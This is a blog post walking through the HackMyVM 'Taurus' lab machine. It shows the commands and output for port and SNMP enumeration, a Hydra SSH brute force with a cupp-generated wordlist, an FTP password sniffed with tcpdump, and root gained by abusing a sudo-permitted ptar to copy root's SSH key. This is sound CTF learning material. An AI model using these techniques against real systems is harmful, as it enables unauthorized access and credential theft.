Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Taurus Walkthrough

HackMyVm Taurus Walkthrough

Keypoints: generate custom dic, tcpdump, IPv6

Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log
 Nmap scan report for deathnote.vuln (
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log
 Nmap scan report for deathnote.vuln (
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp

Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public    
 iso. = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso. = OID: iso.
 iso. = Timeticks: (1183326) 3:17:13.26
 iso. = STRING: "Sarah <>"
 iso. = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso. = STRING: "Unknown"
 iso. = Timeticks: (1) 0:00:00.01

Here is the tricky part.  In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

 ~ cupp -i         
  ___________                                                                         !                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | ]
                             [ Mebus |]
 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)
 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):

Successfully get the password of sarah.

 ~ hydra -l sarah -P sarah.txt -e nsr   ssh -t64 -F 
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 Hydra ( starting at 2021-10-21 11:34:10
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
 [DATA] attacking ssh://
 [22][ssh] host:   login: sarah   password: Sarah_2012
 [STATUS] attack finished for (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra ( finished at 2021-10-21 11:34:26

In sarah's home folder, found a file default.tar, which is unreadable now.

 sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority

Check sudo -l of user.

 sarah@taurus:~$ sudo -l
 Matching Defaults entries for sarah on taurus:
     env_reset, mail_badpass,
 User sarah may run the following commands on taurus:
     (marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp

Try to run it.  The ftp port opened and closed again quickly.

 sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.

Open another ssh terminal, run tcpdump to get data.

 sarah@taurus:~$ tcpdump -i lo  -nn -A
 17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
 615192936], length 34: FTP: 331 Password required for marion
 .{wh.{wh331 Password required for marion
 17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
 length 0
 `.EX. .@.........................................H*[.....(.....
 17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
 615192936], length 18: FTP: PASS ilovesushis

Escalate to user marion, check sudo -l again.

 sarah@taurus:~$ su marion
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar

Use ptar to pack /root/ to /tmp/, then extract it use tar.

 marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
 marion@taurus:/tmp$ tar -xvf root.tar -C ./
 tar: Removing leading `//' from member names
 tar: Removing leading `/' from member names
 marion@taurus:/tmp$ cat ./root/.ssh/id_rsa

Get root with ssh.

 marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa 
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.1